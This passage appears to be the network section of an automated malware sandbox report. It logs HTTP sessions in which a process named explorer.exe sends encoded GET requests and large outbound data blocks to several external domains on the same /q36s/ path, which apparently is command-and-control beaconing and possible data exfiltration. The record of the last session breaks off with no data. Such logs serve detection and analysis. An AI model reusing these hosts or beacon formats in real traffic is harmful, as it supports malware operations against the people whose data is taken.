62 54 6b 77 67 46 38 6b 6a 56 4d 41 54 43 6e 61 51 4d 58 4f 69 42 38 66 65 4e 48 62 52 35 47 7a 56 48 75 53 35 32 7a 64 32 55 45 41 45 42 4f 6e 45 42 49 62 76 4f 4e 48 53 74 38 69 77 47 4b 38 4a 32 55 58 6c 48 50 46 57 54 76 33 74 55 4a 70 45 55 6c 62 5a 74 73 70 52 31 45 72 6c 68 37 72 49 48 2d 34 47 4d 64 4d 67 44 35 6b 57 59 62 6e 32 7e 56 4a 57 48 52 7e 57 65 37 53 5f 28 6f 4b 49 51 73 66 6b 46 36 70 67 30 38 61 49 49 6b 68 6a 49 50 71 41 45 51 71 42 30 4a 43 72 44 51 6e 4a 77 67 77 50 47 41 32 48 30 6f 4c 67 54 48 66 54 72 33 67 77 6e 65 69 4b 46 41 58 72 68 6c 79 4d 4c 72 65 73 4d 32 32 50 37 46 66 4b 42 34 78 38 46 4b 7e 44 45 4d 74 6f 7a 72 65 32 46 46 64 4a 38 39 78 31 55 57 32 73 38 68 57 43 69 62 46 72 6e 30 32 36 4b 77 76 4f 7e 66 4b 61 52 31 44 6e 57 78 79 74 48 2d 59 66 47 59 45 36 4a 4e 74 59 58 66 35 4c 4e 67 48 62 63 45 33 4a 6b 7a 31 76 35 35 73 34 42 37 61 34 45 4e 62 43 72 44 6b 50 6e 53 69 30 31 77 57 51 51 45 78 6f 39 6c 64 4a 53 43 39 41 4c 73 48 4d 67 36 61 6d 53 55 68 36 7a 49 56 68 42 62 6b 38 52 6c 43 74 77 77 77 74 47 33 67 64 69 4b 59 71 6e 78 7e 4a 51 7a 50 66 50 33 28 55 32 4f 7a 47 48 69 6e 31 46 5a 66 5a 32 51 46 5a 64 4a 53 46 72 5f 48 57 67 68 59 4d 4c 50 77 33 74 36 45 42 42 77 4c 31 56 68 47 73 32 77 36 6f 4a 4c 44 64 73 49 6d 50 6f 6f 77 56 79 36 50 58 30 58 64 73 32 47 50 4c 67 6e 79 6e 46 33 36 71 57 31 4d 51 28 74 56 53 28 45 57 48 44 4f 35 75 37 34 42 33 31 51 62 34 67 5a 70 62 67 4d 76 6b 5a 4d 46 36 36 35 6d 41 68 47 4d 63 79 51 77 38 77 71 69 44 79 4d 42 48 69 63 56 39 4d 39 53 59 56 48 6a 39 30 70 75 53 75 6e 4f 56 59 69 56 67 77 32 30 56 6c 7a 75 36 42 4d 33 56 6d 68 6b 53 7e 71 48 50 61 56 73 4a 7e 30 58 56 4f 69 38 6c 39 63 28 75 59 6e 72 41 4e 48 63 38 5a 5f 48 42 54 44 35 58 35 72 69 79 68 6b 64 70 68 58 6d 44 62 67 68 59 71 55 68 4d 37 72 71 69 37 49 59 30 6e 58 46 5a 30 70 73 75 70 67 6c 32 34 69 6e 4e 42 4a 61 37 34 58 53 5f 35 48 63 6c 50 4b 4b 39 54 62 63 45 43 79 6b 75 30 55 55 6c 41 32 6e 34 67 6f 47 50 5a 45 7e 30 4a 6f 66 69 67 74 68 62 4a 73 38 66 4d 59 63 79 6d 68 43 50 6f 44 6a 64 4d 59 72 43 50 52 57 45 39 35 69 54 66 36 30 66 75 65 79 6e 4a 38 28 68 6f 74 31 67 28 4b 61 63 57 33 74 49 64 62 64 49 56 55 31 69 75 74 5a 41 4b 69 36 6a 65 39 37 7a 68 58 50 37 30 62 47 59 33 45 73 65 73 6a 72 67 4c 6d 63 58 7a 41 61 5f 79 41 45 30 4f 56 49 77 57 69 31 30 4a 2d 67 75 53 77 4b 58 6e 64 54 6c 42 72 58 6b 61 6b 46 43 77 41 63 7a Data Ascii: 1bGpqN=h0cF4y6yqVolHcUmO2ox4vGKNmeBPIW9(oBGaBZhsf6lJOWAoc1YUX92DI5yWnfFE-ZCVmqH4Ns-rlNEVWKjJYo_ZJd7nnFo9IbDmhoKyNrRsv7ZP4kZW09BryyjdeSTyuUGxrLSBsDR6rrqioBptqbEfmn6uYJRfmxH0qBJqxUMSTbtNbsk5UBina7mBPE3n8Zx5wIRvah8zKTDu5ImCRiB0hIEHZhGwXPEt_WllHV-cPVZEEpksHSo0teToSqGc946UYAEWpG_JQQdQi0wzFiAEOwJO4O4BH44hGZetWm2(vzrDBpFZj294VSpvvW8z-Wxq7Ly8zujRzhg0pYeY5xX7NE1jhyJxEdBpfkszKIhzGlyGQ3et4pjaAIWbSnb9PwD0GtlBK6kjrNeESrOGbhx7F5UKQNnurzxCh6-GIIK5J3hjRcdfuzOK5G9q1nleOYeRBvEgkIXYX4-Zu8JMYikZNPiKIC-2NCC9uNnWW37AumnHoeAQi6RvYZ1pZew3IHyXx(r4hud6FHXdqskSEZASfxK3l0TP4jbTkwgF8kjVMATCnaQMXOiB8feNHbR5GzVHuS52zd2UEAEBOnEBIbvONHSt8iwGK8J2UXlHPFWTv3tUJpEUlbZtspR1Erlh7rIH-4GMdMgD5kWYbn2~VJWHR~We7S_(oKIQsfkF6pg08aIIkhjIPqAEQqB0JCrDQnJwgwPGA2H0oLgTHfTr3gwneiKFAXrhlyMLresM22P7FfKB4x8FK~DEMtozre2FFdJ89x1UW2s8hWCibFrn026KwvO~fKaR1DnWxytH-YfGYE6JNtYXf5LNgHbcE3Jkz1v55s4B7a4ENbCrDkPnSi01wWQQExo9ldJSC9ALsHMg6amSUh6zIVhBbk8RlCtwwwtG3gdiKYqnx~JQzPfP3(U2OzGHin1FZfZ2QFZdJSFr_HWghYMLPw3t6EBBwL1VhGs2w6oJLDdsImPoowVy6PX0Xds2GPLgnynF36qW1MQ(tVS(EWHDO5u74B31Qb4gZpbgMvkZMF665mAhGMcyQw8wqiDyMBHicV9M9SYVHj90puSunOVYiVgw20Vlzu6BM3VmhkS~qHPaVsJ~0XVOi8l9c(uYnrANHc8Z_HBTD5X5riyhkdphXmDbghYqUhM7rqi7IY0nXFZ0psupgl24inNBJa74XS_5HclPKK9TbcECyku0UUlA2n4goGPZE~0JofigthbJs8fMYcymhCPoDjdMYrCPRWE95iTf60fueynJ8(hot1g(KacW3tIdbdIVU1iutZAKi6je97zhXP70bGY3EsesjrgLmcXzAa_yAE0OVIwWi10J-guSwKXndTlBrXkakFCwAczTZXEXZ0I90esnGbohqQRpzls(kF_K75ncUQ4v_vt209elXGatBauQqhADq(56og_az5WMKufPhV16PUzv72Qzgels5KWVvH8ewuYioysFo4X(fbxYu7HY9BFTQ~Wp9o6vISbxg8C5K57i1YsOY67JxLzUkTisur7xJ7IjjYNvmV-oOfFUdHE3YOBixTqAhygF-AZrnjkGRMp0Mw4FkkX5zOijRoB(8lBDGI41IctJuVaF2b_eo~-c98aM1SXClidcY24oa69m2FglAe2Cxa2Fzt5w4BykBHHuGEdAXSrqgcldqhBWevRZfri76zeJP~drH2t3uDnrQB1Qpijo9p8YO3Yu7j3LcTB43yxeNZb(Y6w7YOoTMJhJnDgIwgK61WjI_Ny6kUO~PxfrRrt9AFjgISUv6o-OiNpT920uhC_ek~Rt2IaWWvT84WSumAmtVa5pIKQFCKFpGef(Fa_tSmYnBgnJiOztt5ZENVvPgNbCsgCNPSw3l791hoM9lWsUulzuCcvmskqjcR20tj5Ux56EnCgsV1Iw_2ygfzD0AfmuKstq4paMak6ntSp4iTZklhSQsYWtJM_IrFYhR5obdYk~s(7T9lwurefwDoKpJqtNiJ_Qry_zoaFgQ4fkOH6HWz5MMDBY4PuqUOthoL7T2DbcYn9dYz55R6wS42lRx6xAdY1AuItUgbyAthWUNmpuGBABAk7W2tlh61v5hnjDtW0NBYvhheZQLtK5v~_k4R0NguVfNb9b4nrLfrJ~EmAj5~stBd5QY7WR3LS~6GfBjasnnDR9LV6PBupXonqLHClfenRMZsjoFuSXsUlX02wDcxhiQIR5hDz4ulogfAL14iWbTSxPmhBsmxVckvAcJsR1DmeyFIZamcRpoo4Ino8ppOmtEvOv6EummOk0DhMyEeM6eVm9FySBIRuwSQ3nST8J7twtiL12WNU7kGedlPrb416KSlccIx87uKXP4sYvyutj5~_Bk6BLmZzAALq9ydzXMKXgEpbVPmDnqaQZPeG7fEP9SLA794Ov8uyQh~xCmjgFYlrVvhU4ejiTqqZiWz5C7AVE4W5Rz7c2c~dmuGkd0Ce3wV9s_uyRYoku4gp0PgaEPWQX9qmC3CtDYodtcxWK7dozDuJIdwX3XXinI7xWUofEadlKe5KC77CUR6MXIAvq24u(aAO7DMXXZZ_~TF-9EmaJgLl4PZp7DYnr1cnwB5I3qw0SgtqeM7B2y953LGNdDh06tWMFNhcPvovqnZItEHBbIiA7oJQ1z5_BgSeaR~EPYyHOGwrAyV1u_BMVVZqD5xQpLwuZZBuJVAov32YFqj5gyKfnFd7qGpK05Of3ZH69nkeK4bJk2azMw4_bR1NbKAUEQNzP3pOmjEY0zWQDicEkxpsRQhRNyxNOdYTZHjZoA6TOfBk55fGwsmZWpnYg-ZZpagU1jyc0hy_eKNoMOOvmaZBw3ddCRzO5SA6G8DIdvDZfOZiEBIy1aBN02o8upMvLdnLX5HRnh2NpUJJGEaIw4k8p_jnL8HD3HyWZqK4dQf9WYL2ZCK58VHo3QrvzHd5UF9AZp8_vBZL7tH4QOhSjsifZs6Il50YHJbwVEwQBTjCfcgqj2zgeFlcKDdJ3YoN0KkK7qiCVXruDJQSYrcVfhXIvIJvM3ckbi(5LKzjUrZw7Us_ZaDieqlydVZUP3pFAD5uZShMlklH83bCKdnbn2519ImpG0lG~1N5arnHwqdt(8uVUxpjl5fFeknVPMSmHVyFCqJV0-c3ISbEW8XmU9z26JKa335Au7PwxKHeRZ~m~6HZo3u5BPaUOas0Spd1QKwKFBp4xBF49zciQtS6uM2lLiNTFhv2bLicfdHf7FK65PFBE6g5riiX01v-us8aaJavap10i2Tn(5520tIIXFD4oOKFw32IMXTnss8iwtJj7K~N781zhYabl_9Vr2xVQLXBQBfUhzAvmZkf~oIUPiV60fCUzIrtc9WbxC9C2hyzloW4qyi3idhab0(eScGGxRxpov6tVxlKCAXHv9oT9rcZwal-pOefcXNemlmOdHYwolkpjv~oVRXEsReA4ZthME8rrIJ-bu9FX9MwMNx6QIaz7P38ATGX2nzeWLo-z5bdzSevwk1XhryR5rZgD5RArRBjcZisk2PtMImSs8kG9IoE~nJ4poTMOsvD8YyDCrf4sgaZ759SHE5teCkQk1Owa7G-SFp9Km8usifPRNEsFzo-yz~nN6T9(mibsPsoeMZ0D-7wsWMZAtBugK2xs-tXMd3d(D8Bpf0swC0hC1Xpd802AD17PMShL0Cne_3vgOk-LClAj9qCiTsRxxzWDOZ4dfBBs801l1EVvTmWiJpoDD~r5AwT3DYbeoMFAhal7x3eu3mQYTCMYyYweWe1LpxF4aTjfQfhtuuTiVW_PQoKBPJ19_FA1kFLrGBdKjRiGRX-0xNJ6zzFF1ogGcbzr6RbDLDOxfF7pyItkSnoAf83anHNgf60escmE9FJZxthDmgRDCHcf-FXJHSiBPtHinVnrINq3kQ2Ae70QQIsMJDJ0tKtdTCgu57cZC9Y1KwjEhlZ6LBcOmXwHjhXRvk98OeeCE1tBXaVDGC7mUMDreuYZ5l28iX2MfPwtklkp_semgt2Rvq2MkuMKTbq3N7cyuljFXo6rE7IF18XLM9YHHnMmt26xETpAeCIIS0LV38LfiGeN3vEpdCwuBuHgsCAjr0LEj6oQg~Vkib
Feb 9, 2022 13:09:15.274097919 CET	10644	OUT	Data Raw: 36 37 77 62 45 4c 66 75 2d 55 64 45 31 55 61 38 72 73 46 50 4a 4b 73 77 74 62 68 36 5a 32 4c 53 38 45 6b 52 33 4a 5f 46 4f 66 38 50 33 38 52 4e 4e 6a 69 6f 77 54 37 39 35 34 6a 66 41 62 75 74 75 7a 6b 69 65 41 58 76 47 51 4c 6e 71 7e 51 7e 4d 71 Data Ascii: 67wbELfu-UdE1Ua8rsFPJKswtbh6Z2LS8EkR3J_FOf8P38RNNjiowT7954jfAbutuzkieAXvGQLnq~Q~MqLhAAh86aBKko5GIw0xWJO30yBcT8nTs~3Ynx0jasydSZg8lpVfFTA~Q77~owCKFk3EinX~-oeB0ojJIydZgr1lFIhS8rRXQoDVW(YFzE6tyQAbKIQoKDHOyV_LMtx6dLiv1EwhGSOOMatA-vfxqx8MxRzEbakSqM3
Feb 9, 2022 13:09:15.274152994 CET	10649	OUT	Data Raw: 54 52 2d 57 6d 70 36 6c 31 34 45 61 61 4d 4f 75 35 41 65 4b 50 72 2d 48 62 32 6c 7e 6e 49 45 51 54 57 6d 6b 6a 73 4c 36 4e 43 42 45 66 64 61 35 4e 4b 78 6e 47 69 46 70 45 50 50 37 63 65 6e 39 7a 65 44 37 47 51 71 33 57 4e 71 62 74 76 49 4c 4b 55 Data Ascii: TR-Wmp6l14EaaMOu5AeKPr-Hb2l~nIEQTWmkjsL6NCBEfda5NKxnGiFpEPP7cen9zeD7GQq3WNqbtvILKUe7Y7INIcxjCoX~Q0-qd32Ff9famjJ3cG9AppDcXjPrt(KLK7bXoCwTmZ4Uzl2OybY(XqhQAHCPyIPZsnfhbx76l~PGlAqZVYMx35a~NYcStp2RO(5D_J-akQ6ZKmpvmaBCyqyyMqkJkKdLjAEzEfc5pw1nWlKOjAB
Feb 9, 2022 13:09:15.274194002 CET	10652	OUT	Data Raw: 78 44 6a 73 30 4f 75 6c 4e 28 7a 62 62 39 53 67 35 78 39 28 37 35 54 6e 6e 4d 6c 41 66 58 73 4f 6d 6c 56 63 52 52 64 39 2d 61 67 73 45 52 50 74 46 59 52 4a 63 28 64 4d 5a 79 4f 6c 63 5a 59 76 73 67 53 57 41 50 44 44 50 46 44 39 67 4b 75 46 32 63 Data Ascii: xDjs0OulN(zbb9Sg5x9(75TnnMlAfXsOmlVcRRd9-agsERPtFYRJc(dMZyOlcZYvsgSWAPDDPFD9gKuF2cG6b8j6WBbtmQ8yw61C-ui2rYq1mbaGNjagneq3Xz16B3-aZ02qdfMrVrizqY-f2hz1rhApFqy~xmos3nN6QT81Uc9xJRL1gHgCl0AmU06xrld1MDswL8QkEPOgn1OoGRjZAWpdjTNycx2ix2FFs9P17msqUIa0m30
Feb 9, 2022 13:09:15.274240017 CET	10659	OUT	Data Raw: 32 54 63 6e 51 63 4e 33 41 28 75 35 67 4c 32 36 4d 32 5f 6d 64 44 50 63 52 37 57 31 51 70 50 49 42 55 43 63 43 73 58 57 35 58 62 48 46 4e 63 77 6e 39 6d 62 68 75 73 58 55 4f 5f 61 78 59 4b 62 6a 4e 50 6d 33 5a 4c 70 79 76 4c 53 54 45 61 31 58 79 Data Ascii: 2TcnQcN3A(u5gL26M2_mdDPcR7W1QpPIBUCcCsXW5XbHFNcwn9mbhusXUO_axYKbjNPm3ZLpyvLSTEa1Xyy9_Hyw2c7Iuao4lp-oC(IX8anloFv(CCxSuopf0Orq2F369HnSknBXmrYV8n_l3T_Q4zGDIOEFdAtdf(SrFUnYCmdT5BdA3leKFJ61d49UFmrsxVTAznjHqJx1mt2cWPVhsQOYq8MDPbkaI3CX4n2vyfBu5qBOJU8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49823	101.35.123.80	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:06:56.987637043 CET	10499	OUT	GET /q36s/?1bGpqN=IHzjIaKw9hHBssJHvR7q+BIW1etDJxSUidZLadnwIl9v5RmtoBh2/TNAfU7VUcX2DTn2&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1 Host: www.oooci.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 9, 2022 13:06:57.232691050 CET	10500	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 09 Feb 2022 12:06:57 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.oooci.com/q36s/?1bGpqN=IHzjIaKw9hHBssJHvR7q+BIW1etDJxSUidZLadnwIl9v5RmtoBh2/TNAfU7VUcX2DTn2&wFNT8=0jNDXxTXR8rtijfp Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.3	49844	104.21.36.34	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:09:15.274487972 CET	10660	OUT	GET /q36s/?1bGpqN=u2o/mXnBhWEQf/pveWhGu62rKF+mK4qUp4dBBRZihtSbDfqqopE5TB84A5tdbEb+PdMV&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1 Host: www.computershit.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 9, 2022 13:09:15.311494112 CET	10662	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 09 Feb 2022 12:09:15 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Wed, 09 Feb 2022 13:09:15 GMT Location: https://www.computershit.net/q36s/?1bGpqN=u2o/mXnBhWEQf/pveWhGu62rKF+mK4qUp4dBBRZihtSbDfqqopE5TB84A5tdbEb+PdMV&wFNT8=0jNDXxTXR8rtijfp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AKV7UcoFSZn4t6wBhPlFnn6JW8zxMjhNpFmy7lzY%2B73g6sX6t%2FEJQc9q9wuIh2AP1IQmJl9GGnfQMwMF58EAXQXlOrofs6S9092%2B2uKFOJDlkpSewi14CeaNkSbtSG1rmRaxv3DvHA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6dacfcde89fc9000-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49825	66.96.160.139	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:07:22.866305113 CET	10508	OUT	GET /q36s/?1bGpqN=VigMRdHlcuoP+Sw3yuFwqC380HsjzcbE0b4n2u2ieXC1OCRINUCS2txvQYXeentP/kMQ&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1 Host: www.perfectselfstorageaston.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 9, 2022 13:07:23.010622025 CET	10509	IN	HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2022 12:07:22 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49826	104.21.36.34	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:07:28.074331999 CET	10510	OUT	GET /q36s/?1bGpqN=u2o/mXnBhWEQf/pveWhGu62rKF+mK4qUp4dBBRZihtSbDfqqopE5TB84A5tdbEb+PdMV&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1 Host: www.computershit.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 9, 2022 13:07:28.125343084 CET	10511	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 09 Feb 2022 12:07:28 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Wed, 09 Feb 2022 13:07:28 GMT Location: https://www.computershit.net/q36s/?1bGpqN=u2o/mXnBhWEQf/pveWhGu62rKF+mK4qUp4dBBRZihtSbDfqqopE5TB84A5tdbEb+PdMV&wFNT8=0jNDXxTXR8rtijfp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iDMFxDhrRoL32jownZUo0Afj9acCdiGZhGTYR1fhA6wf5OGYQkicJYT%2B5H4nQ%2FpX6nXdaG2AcFKA04A9ggBnDssAa36yDhNq0UajRVS01rdtSRYYjMfHaZ2MS5znqyXhXbsA3XsszA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6dacfa407e585c62-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49828	18.194.171.90	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:07:43.313919067 CET	10519	OUT	GET /q36s/?1bGpqN=+82WZbOcHchnV2OkjKF3NixdkboeLFcgXndQeltEW38JzDdOoRl+u1EVmT0W3Jonz/Y6&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1 Host: www.getbraintruth.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 9, 2022 13:07:43.332231998 CET	10519	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 09 Feb 2022 12:07:43 GMT Content-Type: text/html Content-Length: 178 Connection: close Location: https://getbraintruth.com/q36s/?1bGpqN=+82WZbOcHchnV2OkjKF3NixdkboeLFcgXndQeltEW38JzDdOoRl+u1EVmT0W3Jonz/Y6&wFNT8=0jNDXxTXR8rtijfp X-Frame-Options: SAMEORIGIN Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49829	52.20.84.62	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:07:49.210068941 CET	10520	OUT	GET /q36s/?1bGpqN=YsZgiMyir4QObMcXj4/OoGvu8CzjTsx3cWH2zl5uagrD8+tBN1FIEP+EOGgFqY0IHdLq&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1 Host: www.cosmosmeta.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 9, 2022 13:07:49.347565889 CET	10520	IN	HTTP/1.1 404 Not Found Server: openresty Date: Wed, 09 Feb 2022 12:07:49 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 96<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49830	106.186.69.5	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
